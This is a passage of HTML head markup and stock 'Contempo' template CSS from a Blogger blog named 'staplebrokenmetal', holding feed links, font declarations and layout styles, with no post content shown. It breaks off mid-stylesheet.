href='https://staplebrokenmetaliyro.blogspot.com/' rel='canonical'/>\n<link rel=\"alternate\" type=\"application/atom+xml\" title=\"staplebrokenmetal - Atom\" href=\"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default\" />\n<link rel=\"alternate\" type=\"application/rss+xml\" title=\"staplebrokenmetal - RSS\" href=\"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default?alt=rss\" />\n<link rel=\"service.post\" type=\"application/atom+xml\" title=\"staplebrokenmetal - Atom\" href=\"https://www.blogger.com/feeds/3967763303726818370/posts/default\" />\n<link rel=\"me\" href=\"https://www.blogger.com/profile/02686294779557843862\" />\n<!--Can't find substitution for tag [blog.ieCssRetrofitLinks]-->\n<meta content='https://staplebrokenmetaliyro.blogspot.com/' property='og:url'/>\n<meta content='staplebrokenmetal' property='og:title'/>\n<meta content='' property='og:description'/>\n<style type='text/css'>@font-face{font-family:'Damion';font-style:normal;font-weight:400;font-display:swap;src:url(//fonts.gstatic.com/s/damion/v15/hv-XlzJ3KEUe_YZkamwz.ttf)format('truetype');}@font-face{font-family:'Playfair Display';font-style:normal;font-weight:900;font-display:swap;src:url(//fonts.gstatic.com/s/playfairdisplay/v37/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfsunDXbtY.ttf)format('truetype');}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:normal;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAj-lg.ttf)format('truetype');}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:normal;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOMCnqEu92Fr1ME7kSn66aGLdTylUAMQXC89YmC2DPNWubEbVmUiA8.ttf)format('truetype');}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:normal;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOMCnqEu92Fr1ME7kSn66aGLdTylUAMQXC89YmC2DPNWuYjalmUiA8.ttf)format('truetype');}</style>\n<style id='page-skin-1' type='text/css'><!--\n/*! normalize.css v3.0.1 | MIT License | git.io/normalize */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button,select{text-transform:none}button,html input[type=\"button\"],input[type=\"reset\"],input[type=\"submit\"]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}input{line-height:normal}input[type=\"checkbox\"],input[type=\"radio\"]{box-sizing:border-box;padding:0}input[type=\"number\"]::-webkit-inner-spin-button,input[type=\"number\"]::-webkit-outer-spin-button{height:auto}input[type=\"search\"]{-webkit-appearance:textfield;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;box-sizing:content-box}input[type=\"search\"]::-webkit-search-cancel-button,input[type=\"search\"]::-webkit-search-decoration{-webkit-appearance:none}fieldset{border:1px solid #c0c0c0;margin:0 2px;padding:.35em .625em .75em}legend{border:0;padding:0}textarea{overflow:auto}optgroup{font-weight:bold}table{border-collapse:collapse;border-spacing:0}td,th{padding:0}\n/*!************************************************\n* Blogger Template Style\n* Name: Contempo\n**************************************************/\nbody{\noverflow-wrap:break-word;\nword-break:break-word;\nword-wrap:break-word\n}\n.hidden{\ndisplay:none\n}\n.invisible{\nvisibility:hidden\n}\n.container::after,.float-container::after{\nclear:both;\ncontent:\"\";\ndisplay:table\n}\n.clearboth{\nclear:both\n}\n#comments .comment .comment-actions,.subscribe-popup .FollowByEmail .follow-by-email-submit,.widget.Profile .profile-link,.widget.Profile .profile-link.visit-profile{\nbackground:0 0;\nborder:0;\nbox-shadow:none;\ncolor:#2196f3;\ncursor:pointer;\nfont-size:14px;\nfont-weight:700;\noutline:0;\ntext-decoration:none;\ntext-transform:uppercase;\nwidth:auto\n}\n.dim-overlay{\nbackground-color:rgba(0,0,0,.54);\nheight:100vh;\nleft:0;\nposition:fixed;\ntop:0;\nwidth:100%\n}\n#sharing-dim-overlay{\nbackground-color:transparent\n}\ninput::-ms-clear{\ndisplay:none\n}\n.blogger-logo,.svg-icon-24.blogger-logo{\nfill:#ff9800;\nopacity:1\n}\n.loading-spinner-large{\n-webkit-animation:mspin-rotate 1.568s infinite linear;\nanimation:mspin-rotate 1.568s infinite linear;\nheight:48px;\noverflow:hidden;\nposition:absolute;\nwidth:48px;\nz-index:200\n}\n.loading-spinner-large>div{\n-webkit-animation:mspin-revrot 5332ms infinite steps(4);\nanimation:mspin-revrot 5332ms infinite steps(4)\n}\n.loading-spinner-large>div>div{\n-webkit-animation:mspin-singlecolor-large-film 1333ms infinite steps(81);\nanimation:mspin-singlecolor-large-film 1333ms infinite steps(81);\nbackground-size:100%;\nheight:48px;\nwidth:3888px\n}\n.mspin-black-large>div>div,.mspin-grey_54-large>div>div{\nbackground-image:url(https://www.blogblog.com/indie/mspin_black_large.svg)\n}\n.mspin-white-large>div>div{\nbackground-image:url(https://www.blogblog.com/indie/mspin_white_large.svg)\n}\n.mspin-grey_54-large{\nopacity:.54\n}\n@-webkit-keyframes mspin-singlecolor-large-film{\nfrom{\n-webkit-transform:translateX(0);\ntransform:translateX(0)\n}\nto{\n-webkit-transform:translateX(-3888px);\ntransform:translateX(-3888px)\n}\n}\n@keyframes mspin-singlecolor-large-film{\nfrom{\n-webkit-transform:translateX(0);\ntransform:translateX(0)\n}\nto{\n-webkit-transform:translateX(-3888px);\ntransform:translateX(-3888px)\n}\n}\n@-webkit-keyframes mspin-rotate{\nfrom{\n-webkit-transform:rotate(0);\ntransform:rotate(0)\n}\nto{\n-webkit-transform:rotate(360deg);\ntransform:rotate(360deg)\n}\n}\n@keyframes mspin-rotate{\nfrom{\n-webkit-transform:rotate(0);\ntransform:rotate(0)\n}\nto{\n-webkit-transform:rotate(360deg);\ntransform:rotate(360deg)\n}\n}\n@-webkit-keyframes mspin-revrot{\nfrom{\n-webkit-transform:rotate(0);\ntransform:rotate(0)\n}\nto{\n-webkit-transform:rotate(-360deg);\ntransform:rotate(-360deg)\n}\n}\n@keyframes mspin-revrot{\nfrom{\n-webkit-transform:rotate(0);\ntransform:rotate(0)\n}\nto{\n-webkit-transform:rotate(-360deg);\ntransform:rotate(-360deg)\n}\n}\n.skip-navigation{\nbackground-color:#fff;\nbox-sizing:border-box;\ncolor:#000;\ndisplay:block;\nheight:0;\nleft:0;\nline-height:50px;\noverflow:hidden;\npadding-top:0;\nposition:fixed;\ntext-align:center;\ntop:0;\n-webkit-transition:box-shadow .3s,height .3s,padding-top .3s;\ntransition:box-shadow .3s,height .3s,padding-top .3s;\nwidth:100%;\nz-index:900\n}\n.skip-navigation:focus{\nbox-shadow:0 4px 5px 0 rgba(0,0,0,.14),0 1px 10px 0 rgba(0,0,0,.12),0 2px 4px -1px rgba(0,0,0,.2);\nheight:50px\n}\n#main{\noutline:0\n}\n.main-heading{\nposition:absolute;\nclip:rect(1px,1px,1px,1px);\npadding:0;\nborder:0;\nheight:1px;\nwidth:1px;\noverflow:hidden\n}\n.Attribution{\nmargin-top:1em;\ntext-align:center\n}\n.Attribution .blogger img,.Attribution .blogger svg{\nvertical-align:bottom\n}\n.Attribution .blogger img{\nmargin-right:.5em\n}\n.Attribution div{\nline-height:24px;\nmargin-top:.5em\n}\n.Attribution .copyright,.Attribution .image-attribution{\nfont-size:.7em;\nmargin-top:1.5em\n}\n.BLOG_mobile_video_class{\ndisplay:none\n}\n.bg-photo{\nbackground-attachment:scroll!important\n}\nbody .CSS_LIGHTBOX{\nz-index:900\n}\n.extendable .show-less,.extendable .show-more{\nborder-color:#2196f3;\ncolor:#2196f3;\nmargin-top:8px\n}\n.extendable .show-less.hidden,.extendable .show-more.hidden{\ndisplay:none\n}\n.inline-ad{\ndisplay:none;\nmax-width:100%;\noverflow:hidden\n}\n.adsbygoogle{\ndisplay:block\n}\n#cookieChoiceInfo{\nbottom:0;\ntop:auto\n}\niframe.b-hbp-video{\nborder:0\n}\n.post-body img{\nmax-width:100%\n}\n.post-body iframe{\nmax-width:100%\n}\n.post-body a[imageanchor=\"1\"]{\ndisplay:inline-block\n}\n.byline{\nmargin-right:1em\n}\n.byline:last-child{\nmargin-right:0\n}\n.link-copied-dialog{\nmax-width:520px;\noutline:0\n}\n.link-copied-dialog .modal-dialog-buttons{\nmargin-top:8px\n}\n.link-copied-dialog .goog-buttonset-default{\nbackground:0 0;\nborder:0\n}\n.link-copied-dialog .goog-buttonset-default:focus{\noutline:0\n}\n.paging-control-container{\nmargin-bottom:16px\n}\n.paging-control-container .paging-control{\ndisplay:inline-block\n}\n.paging-control-container .comment-range-text::after,.paging-control-container .paging-control{\ncolor:#2196f3\n}\n.paging-control-container .comment-range-text,.paging-control-container .paging-control{\nmargin-right:8px\n}\n.paging-control-container .comment-range-text::after,.paging-control-container .paging-control::after{\ncontent:\"\\b7\";\ncursor:default;\npadding-left:8px;\npointer-events:none\n}\n.paging-control-container .comment-range-text:last-child::after,.paging-control-container .paging-control:last-child::after{\ncontent:none\n}\n.byline.reactions iframe{\nheight:20px\n}\n.b-notification{\ncolor:#000;\nbackground-color:#fff;\nborder-bottom:solid 1px #000;\nbox-sizing:border-box;\npadding:16px 32px;\ntext-align:center\n}\n.b-notification.visible{\n-webkit-transition:margin-top .3s cubic-bezier(.4,0,.2,1);\ntransition:margin-top .3s cubic-bezier(.4,0,.2,1)\n}\n.b-notification.invisible{\nposition:absolute\n}\n.b-notification-close{\nposition:absolute;\nright:8px;\ntop:8px\n}\n.no-posts-message{\nline-height:40px;\ntext-align:center\n}\n@media screen and (max-width:800px){\nbody.item-view .post-body a[imageanchor=\"1\"][style*=\"float: left;\"],body.item-view .post-body a[imageanchor=\"1\"][style*=\"float: right;\"]{\nfloat:none!important;\nclear:none!important\n}\nbody.item-view .post-body a[imageanchor=\"1\"] img{\ndisplay:block;\nheight:auto;\nmargin:0 auto\n}\nbody.item-view .post-body>.separator:first-child>a[imageanchor=\"1\"]:first-child{\nmargin-top:20px\n}\n.post-body a[imageanchor]{\ndisplay:block\n}\nbody.item-view .post-body a[imageanchor=\"1\"]{\nmargin-left:0!important;\nmargin-right:0!important\n}\nbody.item-view .post-body a[imageanchor=\"1\"]+a[imageanchor=\"1\"]{\nmargin-top:16px\n}\n}\n.item-control{\ndisplay:none\n}\n#comments{\nborder-top:1px dashed rgba(0,0,0,.54);\nmargin-top:20px;\npadding:20px\n}\n#comments .comment-thread ol{\nmargin:0;\npadding-left:0;\npadding-left:0\n}\n#comments .comment .comment-replybox-single,#comments .comment-thread .comment-replies{\nmargin-left:60px\n}\n#comments .comment-thread .thread-count{\ndisplay:none\n}\n#comments .comment{\nlist-style-type:none;\npadding:0 0 30px;\nposition:relative\n}\n#comments .comment .comment{\npadding-bottom:8px\n}\n.comment .avatar-image-container{\nposition:absolute\n}\n.comment .avatar-image-container img{\nborder-radius:50%\n}\n.avatar-image-container svg,.comment .avatar-image-container .avatar-icon{\nborder-radius:50%;\nborder:solid 1px #707070;\nbox-sizing:border-box;\nfill:#707070;\nheight:35px;\nmargin:0;\npadding:7px;\nwidth:35px\n}\n.comment .comment-block{\nmargin-top:10px;\nmargin-left:60px;\npadding-bottom:0\n}\n#comments .comment-author-header-wrapper{\nmargin-left:40px\n}\n#comments .comment .thread-expanded .comment-block{\npadding-bottom:20px\n}\n#comments .comment .comment-header .user,#comments .comment .comment-header .user a{\ncolor:#212121;\nfont-style:normal;\nfont-weight:700\n}\n#comments .comment .comment-actions{\nbottom:0;\nmargin-bottom:15px;\nposition:absolute\n}\n#comments .comment .comment-actions>*{\nmargin-right:8px\n}\n#comments .comment .comment-header .datetime{\nbottom:0;\ncolor:rgba(33,33,33,.54);\ndisplay:inline-block;\nfont-size:13px;\nfont-style:italic;\nmargin-left:8px\n}\n#comments .comment .comment-footer .comment-timestamp a,#comments .comment .comment-header .datetime a{\ncolor:rgba(33,33,33,.54)\n}\n#comments .comment .comment-content,.comment .comment-body{\nmargin-top:12px;\nword-break:break-word\n}\n.comment-body{\nmargin-bottom:12px\n}\n#comments.embed[data-num-comments=\"0\"]{\nborder:0;\nmargin-top:0;\npadding-top:0\n}\n#comments.embed[data-num-comments=\"0\"] #comment-post-message,#comments.embed[data-num-comments=\"0\"] div.comment-form>p,#comments.embed[data-num-comments=\"0\"] p.comment-footer{\ndisplay:none\n}\n#comment-editor-src{\ndisplay:none\n}\n.comments .comments-content .loadmore.loaded{\nmax-height:0;\nopacity:0;\noverflow:hidden\n}\n.extendable .remaining-items{\nheight:0;\noverflow:hidden;\n-webkit-transition:height .3s cubic-bezier(.4,0,.2,1);\ntransition:height .3s cubic-bezier(.4,0,.2,1)\n}\n.extendable .remaining-items.expanded{\nheight:auto\n}\n.svg-icon-24,.svg-icon-24-button{\ncursor:pointer;\nheight:24px;\nwidth:24px;\nmin-width:24px\n}\n.touch-icon{\nmargin:-12px;\npadding:12px\n}\n.touch-icon:active,.touch-icon:focus{\nbackground-color:rgba(153,153,153,.4);\nborder-radius:50%\n}\nsvg:not(:root).touch-icon{\noverflow:visible\n}\nhtml[dir=rtl] .rtl-reversible-icon{\n-webkit-transform:scaleX(-1);\n-ms-transform:scaleX(-1);\ntransform:scaleX(-1)\n}\n.svg-icon-24-button,.touch-icon-button{\nbackground:0 0;\nborder:0;\nmargin:0;\noutline:0;\npadding:0\n}\n.touch-icon-button .touch-icon:active,.touch-icon-button .touch-icon:focus{\nbackground-color:transparent\n}\n.touch-icon-button:active .touch-icon,.touch-icon-button:focus .touch-icon{\nbackground-color:rgba(153,153,153,.4);\nborder-radius:50%\n}\n.Profile .default-avatar-wrapper .avatar-icon{\nborder-radius:50%;\nborder:solid 1px #707070;\nbox-sizing:border-box;\nfill:#707070;\nmargin:0\n}\n.Profile .individual .default-avatar-wrapper .avatar-icon{\npadding:25px\n}\n.Profile .individual .avatar-icon,.Profile .individual .profile-img{\nheight:120px;\nwidth:120px\n}\n.Profile .team .default-avatar-wrapper .avatar-icon{\npadding:8px\n}\n.Profile .team .avatar-icon,.Profile .team .default-avatar-wrapper,.Profile .team .profile-img{\nheight:40px;\nwidth:40px\n}\n.snippet-container{\nmargin:0;\nposition:relative;\noverflow:hidden\n}\n.snippet-fade{\nbottom:0;\nbox-sizing:border-box;\nposition:absolute;\nwidth:96px\n}\n.snippet-fade{\nright:0\n}\n.snippet-fade:after{\ncontent:\"\\2026\"\n}\n.snippet-fade:after{\nfloat:right\n}\n.post-bottom{\n-webkit-box-align:center;\n-webkit-align-items:center;\n-ms-flex-align:center;\nalign-items:center;\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\n-webkit-flex-wrap:wrap;\n-ms-flex-wrap:wrap;\nflex-wrap:wrap\n}\n.post-footer{\n-webkit-box-flex:1;\n-webkit-flex:1 1 auto;\n-ms-flex:1 1 auto;\nflex:1 1 auto;\n-webkit-flex-wrap:wrap;\n-ms-flex-wrap:wrap;\nflex-wrap:wrap;\n-webkit-box-ordinal-group:2;\n-webkit-order:1;\n-ms-flex-order:1;\norder:1\n}\n.post-footer>*{\n-webkit-box-flex:0;\n-webkit-flex:0 1 auto;\n-ms-flex:0 1 auto;\nflex:0 1 auto\n}\n.post-footer .byline:last-child{\nmargin-right:1em\n}\n.jump-link{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto;\n-webkit-box-ordinal-group:3;\n-webkit-order:2;\n-ms-flex-order:2;\norder:2\n}\n.centered-top-container.sticky{\nleft:0;\nposition:fixed;\nright:0;\ntop:0;\nwidth:auto;\nz-index:50;\n-webkit-transition-property:opacity,-webkit-transform;\ntransition-property:opacity,-webkit-transform;\ntransition-property:transform,opacity;\ntransition-property:transform,opacity,-webkit-transform;\n-webkit-transition-duration:.2s;\ntransition-duration:.2s;\n-webkit-transition-timing-function:cubic-bezier(.4,0,.2,1);\ntransition-timing-function:cubic-bezier(.4,0,.2,1)\n}\n.centered-top-placeholder{\ndisplay:none\n}\n.collapsed-header .centered-top-placeholder{\ndisplay:block\n}\n.centered-top-container .Header .replaced h1,.centered-top-placeholder .Header .replaced h1{\ndisplay:none\n}\n.centered-top-container.sticky .Header .replaced h1{\ndisplay:block\n}\n.centered-top-container.sticky .Header .header-widget{\nbackground:0 0\n}\n.centered-top-container.sticky .Header .header-image-wrapper{\ndisplay:none\n}\n.centered-top-container img,.centered-top-placeholder img{\nmax-width:100%\n}\n.collapsible{\n-webkit-transition:height .3s cubic-bezier(.4,0,.2,1);\ntransition:height .3s cubic-bezier(.4,0,.2,1)\n}\n.collapsible,.collapsible>summary{\ndisplay:block;\noverflow:hidden\n}\n.collapsible>:not(summary){\ndisplay:none\n}\n.collapsible[open]>:not(summary){\ndisplay:block\n}\n.collapsible:focus,.collapsible>summary:focus{\noutline:0\n}\n.collapsible>summary{\ncursor:pointer;\ndisplay:block;\npadding:0\n}\n.collapsible:focus>summary,.collapsible>summary:focus{\nbackground-color:transparent\n}\n.collapsible>summary::-webkit-details-marker{\ndisplay:none\n}\n.collapsible-title{\n-webkit-box-align:center;\n-webkit-align-items:center;\n-ms-flex-align:center;\nalign-items:center;\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex\n}\n.collapsible-title .title{\n-webkit-box-flex:1;\n-webkit-flex:1 1 auto;\n-ms-flex:1 1 auto;\nflex:1 1 auto;\n-webkit-box-ordinal-group:1;\n-webkit-order:0;\n-ms-flex-order:0;\norder:0;\noverflow:hidden;\ntext-overflow:ellipsis;\nwhite-space:nowrap\n}\n.collapsible-title .chevron-down,.collapsible[open] .collapsible-title .chevron-up{\ndisplay:block\n}\n.collapsible-title .chevron-up,.collapsible[open] .collapsible-title .chevron-down{\ndisplay:none\n}\n.flat-button{\ncursor:pointer;\ndisplay:inline-block;\nfont-weight:700;\ntext-transform:uppercase;\nborder-radius:2px;\npadding:8px;\nmargin:-8px\n}\n.flat-icon-button{\nbackground:0 0;\nborder:0;\nmargin:0;\noutline:0;\npadding:0;\nmargin:-12px;\npadding:12px;\ncursor:pointer;\nbox-sizing:content-box;\ndisplay:inline-block;\nline-height:0\n}\n.flat-icon-button,.flat-icon-button .splash-wrapper{\nborder-radius:50%\n}\n.flat-icon-button .splash.animate{\n-webkit-animation-duration:.3s;\nanimation-duration:.3s\n}\n.overflowable-container{\nmax-height:46px;\noverflow:hidden;\nposition:relative\n}\n.overflow-button{\ncursor:pointer\n}\n#overflowable-dim-overlay{\nbackground:0 0\n}\n.overflow-popup{\nbox-shadow:0 2px 2px 0 rgba(0,0,0,.14),0 3px 1px -2px rgba(0,0,0,.2),0 1px 5px 0 rgba(0,0,0,.12);\nbackground-color:#ffffff;\nleft:0;\nmax-width:calc(100% - 32px);\nposition:absolute;\ntop:0;\nvisibility:hidden;\nz-index:101\n}\n.overflow-popup ul{\nlist-style:none\n}\n.overflow-popup .tabs li,.overflow-popup li{\ndisplay:block;\nheight:auto\n}\n.overflow-popup .tabs li{\npadding-left:0;\npadding-right:0\n}\n.overflow-button.hidden,.overflow-popup .tabs li.hidden,.overflow-popup li.hidden{\ndisplay:none\n}\n.pill-button{\nbackground:0 0;\nborder:1px solid;\nborder-radius:12px;\ncursor:pointer;\ndisplay:inline-block;\npadding:4px 16px;\ntext-transform:uppercase\n}\n.ripple{\nposition:relative\n}\n.ripple>*{\nz-index:1\n}\n.splash-wrapper{\nbottom:0;\nleft:0;\noverflow:hidden;\npointer-events:none;\nposition:absolute;\nright:0;\ntop:0;\nz-index:0\n}\n.splash{\nbackground:#ccc;\nborder-radius:100%;\ndisplay:block;\nopacity:.6;\nposition:absolute;\n-webkit-transform:scale(0);\n-ms-transform:scale(0);\ntransform:scale(0)\n}\n.splash.animate{\n-webkit-animation:ripple-effect .4s linear;\nanimation:ripple-effect .4s linear\n}\n@-webkit-keyframes ripple-effect{\n100%{\nopacity:0;\n-webkit-transform:scale(2.5);\ntransform:scale(2.5)\n}\n}\n@keyframes ripple-effect{\n100%{\nopacity:0;\n-webkit-transform:scale(2.5);\ntransform:scale(2.5)\n}\n}\n.search{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\nline-height:24px;\nwidth:24px\n}\n.search.focused{\nwidth:100%\n}\n.search.focused .section{\nwidth:100%\n}\n.search form{\nz-index:101\n}\n.search h3{\ndisplay:none\n}\n.search form{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex;\n-webkit-box-flex:1;\n-webkit-flex:1 0 0;\n-ms-flex:1 0 0px;\nflex:1 0 0;\nborder-bottom:solid 1px transparent;\npadding-bottom:8px\n}\n.search form>*{\ndisplay:none\n}\n.search.focused form>*{\ndisplay:block\n}\n.search .search-input label{\ndisplay:none\n}\n.centered-top-placeholder.cloned .search form{\nz-index:30\n}\n.search.focused form{\nborder-color:#ffffff;\nposition:relative;\nwidth:auto\n}\n.collapsed-header .centered-top-container .search.focused form{\nborder-bottom-color:transparent\n}\n.search-expand{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto\n}\n.search-expand-text{\ndisplay:none\n}\n.search-close{\ndisplay:inline;\nvertical-align:middle\n}\n.search-input{\n-webkit-box-flex:1;\n-webkit-flex:1 0 1px;\n-ms-flex:1 0 1px;\nflex:1 0 1px\n}\n.search-input input{\nbackground:0 0;\nborder:0;\nbox-sizing:border-box;\ncolor:#ffffff;\ndisplay:inline-block;\noutline:0;\nwidth:calc(100% - 48px)\n}\n.search-input input.no-cursor{\ncolor:transparent;\ntext-shadow:0 0 0 #ffffff\n}\n.collapsed-header .centered-top-container .search-action,.collapsed-header .centered-top-container .search-input input{\ncolor:#212121\n}\n.collapsed-header .centered-top-container .search-input input.no-cursor{\ncolor:transparent;\ntext-shadow:0 0 0 #212121\n}\n.collapsed-header .centered-top-container .search-input input.no-cursor:focus,.search-input input.no-cursor:focus{\noutline:0\n}\n.search-focused>*{\nvisibility:hidden\n}\n.search-focused .search,.search-focused .search-icon{\nvisibility:visible\n}\n.search.focused .search-action{\ndisplay:block\n}\n.search.focused .search-action:disabled{\nopacity:.3\n}\n.widget.Sharing .sharing-button{\ndisplay:none\n}\n.widget.Sharing .sharing-buttons li{\npadding:0\n}\n.widget.Sharing .sharing-buttons li span{\ndisplay:none\n}\n.post-share-buttons{\nposition:relative\n}\n.centered-bottom .share-buttons .svg-icon-24,.share-buttons .svg-icon-24{\nfill:#212121\n}\n.sharing-open.touch-icon-button:active .touch-icon,.sharing-open.touch-icon-button:focus .touch-icon{\nbackground-color:transparent\n}\n.share-buttons{\nbackground-color:#ffffff;\nborder-radius:2px;\nbox-shadow:0 2px 2px 0 rgba(0,0,0,.14),0 3px 1px -2px rgba(0,0,0,.2),0 1px 5px 0 rgba(0,0,0,.12);\ncolor:#212121;\nlist-style:none;\nmargin:0;\npadding:8px 0;\nposition:absolute;\ntop:-11px;\nmin-width:200px;\nz-index:101\n}\n.share-buttons.hidden{\ndisplay:none\n}\n.sharing-button{\nbackground:0 0;\nborder:0;\nmargin:0;\noutline:0;\npadding:0;\ncursor:pointer\n}\n.share-buttons li{\nmargin:0;\nheight:48px\n}\n.share-buttons li:last-child{\nmargin-bottom:0\n}\n.share-buttons li .sharing-platform-button{\nbox-sizing:border-box;\ncursor:pointer;\ndisplay:block;\nheight:100%;\nmargin-bottom:0;\npadding:0 16px;\nposition:relative;\nwidth:100%\n}\n.share-buttons li .sharing-platform-button:focus,.share-buttons li .sharing-platform-button:hover{\nbackground-color:rgba(128,128,128,.1);\noutline:0\n}\n.share-buttons li svg[class*=\" sharing-\"],.share-buttons li svg[class^=sharing-]{\nposition:absolute;\ntop:10px\n}\n.share-buttons li span.sharing-platform-button{\nposition:relative;\ntop:0\n}\n.share-buttons li .platform-sharing-text{\ndisplay:block;\nfont-size:16px;\nline-height:48px;\nwhite-space:nowrap\n}\n.share-buttons li .platform-sharing-text{\nmargin-left:56px\n}\n.sidebar-container{\nbackground-color:#ffffff;\nmax-width:284px;\noverflow-y:auto;\n-webkit-transition-property:-webkit-transform;\ntransition-property:-webkit-transform;\ntransition-property:transform;\ntransition-property:transform,-webkit-transform;\n-webkit-transition-duration:.3s;\ntransition-duration:.3s;\n-webkit-transition-timing-function:cubic-bezier(0,0,.2,1);\ntransition-timing-function:cubic-bezier(0,0,.2,1);\nwidth:284px;\nz-index:101;\n-webkit-overflow-scrolling:touch\n}\n.sidebar-container .navigation{\nline-height:0;\npadding:16px\n}\n.sidebar-container .sidebar-back{\ncursor:pointer\n}\n.sidebar-container .widget{\nbackground:0 0;\nmargin:0 16px;\npadding:16px 0\n}\n.sidebar-container .widget .title{\ncolor:#212121;\nmargin:0\n}\n.sidebar-container .widget ul{\nlist-style:none;\nmargin:0;\npadding:0\n}\n.sidebar-container .widget ul ul{\nmargin-left:1em\n}\n.sidebar-container .widget li{\nfont-size:16px;\nline-height:normal\n}\n.sidebar-container .widget+.widget{\nborder-top:1px dashed #cccccc\n}\n.BlogArchive li{\nmargin:16px 0\n}\n.BlogArchive li:last-child{\nmargin-bottom:0\n}\n.Label li a{\ndisplay:inline-block\n}\n.BlogArchive .post-count,.Label .label-count{\nfloat:right;\nmargin-left:.25em\n}\n.BlogArchive .post-count::before,.Label .label-count::before{\ncontent:\"(\"\n}\n.BlogArchive .post-count::after,.Label .label-count::after{\ncontent:\")\"\n}\n.widget.Translate .skiptranslate>div{\ndisplay:block!important\n}\n.widget.Profile .profile-link{\ndisplay:-webkit-box;\ndisplay:-webkit-flex;\ndisplay:-ms-flexbox;\ndisplay:flex\n}\n.widget.Profile .team-member .default-avatar-wrapper,.widget.Profile .team-member .profile-img{\n-webkit-box-flex:0;\n-webkit-flex:0 0 auto;\n-ms-flex:0 0 auto;\nflex:0 0 auto;\nmargin-right:1em\n}\n.widget.Profile .individual .profile-link{\n-webkit-box-orient:vertical;\n-webkit-box-direction:normal;\n-webkit-flex-direction:column;\n-ms-flex-direction:column;\nflex-direction:column\n}\n.widget.Profile .team .profile-link .profile-name{\n-webkit-align-self:center;\n-ms-flex-item-align:center;\nalign-self:center;\ndisplay:block;\n-webkit-box-flex:1;\n-webkit-flex:1 1 auto;\n-ms-flex:1 1 auto;\nflex:1 1 auto\n}\n.dim-overlay{\nbackground-color:rgba(0,0,0,.54);\nz-index:100\n}\nbody.sidebar-visible{\noverflow-y:hidden\n}\n@media screen and (max-width:1439px){\n.sidebar-container{\nbottom:0;\nposition:fixed;\ntop:0;\nleft:0;\nright:auto\n}\n.sidebar-container.sidebar-invisible{\n-webkit-transition-timing-function:cubic-bezier(.4,0,.6,1);\ntransition-timing-function:cubic-bezier(.4,0,.6,1);\n-webkit-transform:translateX(-284px);\n-ms-transform:translateX(-284px);\ntransform:translateX(-284px)\n}\n}\n@media screen and (min-width:1440px){\n.sidebar-container{\nposition:absolute;\ntop:0;\nleft:0;\nright:auto\n}\n.sidebar-container .navigation{\ndisplay:none\n}\n}\n.dialog{\nbox-shadow:0 2px 2px 0 rgba(0,0,0,.14),0 3px 1px -2px rgba(0,0,0,.2),0 1px 5px 0 rgba(0,0,0,.12);\nbackground:#ffffff;\nbox-sizing:border-box;\ncolor:#757575;\npadding:30px;\nposition:fixed;\ntext-align:center;\nwidth:calc(100% - 24px);\nz-index:101\n}\n.dialog input[type=email],.dialog input[type=text]{\nbackground-color:transparent;\nborder:0;\nborder-bottom:solid 1px rgba(117,117,117,.12);\ncolor:#757575;\ndisplay:block;\nfont-family:Roboto, sans-serif;\nfont-size:16px;\nline-height:24px;\nmargin:auto;\npadding-bottom:7px;\noutline:0;\ntext-align:center;\nwidth:100%\n}\n.dialog input[type=email]::-webkit-input-placeholder,.dialog input[type=text]::-webkit-input-placeholder{\ncolor:#757575\n}\n.dialog input[type=email]::-moz-placeholder,.dialog input[type=text]::-moz-placeholder{\ncolor:#757575\n}\n.dialog input[type=email]:-ms-input-placeholder,.dialog input[type=text]:-ms-input-placeholder{\ncolor:#757575\n}\n.dialog input[type=email]::-ms-input-placeholder,.dialog input[type=text]::-ms-input-placeholder{\ncolor:#757575\n}\n.dialog input[type=email]::placeholder,.dialog input[type=text]::placeholder{\ncolor:#757575\n}\n.dialog input[type=email]:focus,.dialog input[type=text]:focus{\nborder-bottom:solid 2px #2196f3;\npadding-bottom:6px\n}\n.dialog input.no-cursor{\ncolor:transparent;\ntext-shadow:0 0 0 #757575\n}\n.dialog input.no-cursor:focus{\noutline:0\n}\n.dialog input.no-cursor:focus{\noutline:0\n}\n.dialog input[type=submit]{\nfont-family:Roboto, sans-serif\n}\n.dialog .goog-buttonset-default{\ncolor:#2196f3\n}\n.subscribe-popup{\nmax-width:364px\n}\n.subscribe-popup 